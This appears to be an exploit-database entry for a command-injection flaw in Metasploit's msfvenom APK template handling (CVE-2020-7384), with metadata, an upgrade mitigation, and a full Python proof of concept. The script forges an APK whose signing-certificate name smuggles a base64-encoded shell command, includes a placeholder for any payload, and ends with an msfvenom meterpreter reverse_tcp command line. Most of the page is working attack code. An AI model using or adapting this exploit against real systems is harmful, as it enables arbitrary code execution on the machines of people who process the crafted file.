Metasploit Framework 6.0.11 - msfvenom APK template command injection

vendor:

Metasploit Framework

by:

Justin Steven

7.8

CVSS

HIGH

Command Injection

CWE

Product Name: Metasploit Framework

Affected Version From: Metasploit Framework 6.0.11

Affected Version To: Metasploit Pro 4.18.0

Patch Exists: YES

Related CWE: CVE-2020-7384

CPE: a:rapid7:metasploit_framework:6.0.11

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: None

2020

Metasploit Framework 6.0.11 – msfvenom APK template command injection

Metasploit Framework 6.0.11 and Metasploit Pro 4.18.0 are vulnerable to command injection via the msfvenom APK template command. An attacker can craft a malicious APK file with a malicious -dname parameter and use it to execute arbitrary code on the target system.

Mitigation:

Users should upgrade to the latest version of Metasploit Framework and Metasploit Pro to mitigate this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: Metasploit Framework 6.0.11 - msfvenom APK template command injection
# Exploit Author: Justin Steven
# Vendor Homepage: https://www.metasploit.com/
# Software Link: https://www.metasploit.com/
# Version: Metasploit Framework 6.0.11 and Metasploit Pro 4.18.0
# CVE : CVE-2020-7384

#!/usr/bin/env python3
import subprocess
import tempfile
import os
from base64 import b64encode

# Change me
payload = 'echo "Code execution as $(id)" > /tmp/win'

# b64encode to avoid badchars (keytool is picky)
payload_b64 = b64encode(payload.encode()).decode()
dname = f"CN='|echo {payload_b64} | base64 -d | sh #"

print(f"[+] Manufacturing evil apkfile")
print(f"Payload: {payload}")
print(f"-dname: {dname}")
print()

tmpdir = tempfile.mkdtemp()
apk_file = os.path.join(tmpdir, "evil.apk")
empty_file = os.path.join(tmpdir, "empty")
keystore_file = os.path.join(tmpdir, "signing.keystore")
storepass = keypass = "password"
key_alias = "signing.key"

# Touch empty_file
open(empty_file, "w").close()

# Create apk_file
subprocess.check_call(["zip", "-j", apk_file, empty_file])

# Generate signing key with malicious -dname
subprocess.check_call(["keytool", "-genkey", "-keystore", keystore_file, "-alias", key_alias, "-storepass", storepass,
                       "-keypass", keypass, "-keyalg", "RSA", "-keysize", "2048", "-dname", dname])

# Sign APK using our malicious dname
subprocess.check_call(["jarsigner", "-sigalg", "SHA1withRSA", "-digestalg", "SHA1", "-keystore", keystore_file,
                       "-storepass", storepass, "-keypass", keypass, apk_file, key_alias])

print()
print(f"[+] Done! apkfile is at {apk_file}")
print(f"Do: msfvenom -x {apk_file} -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null")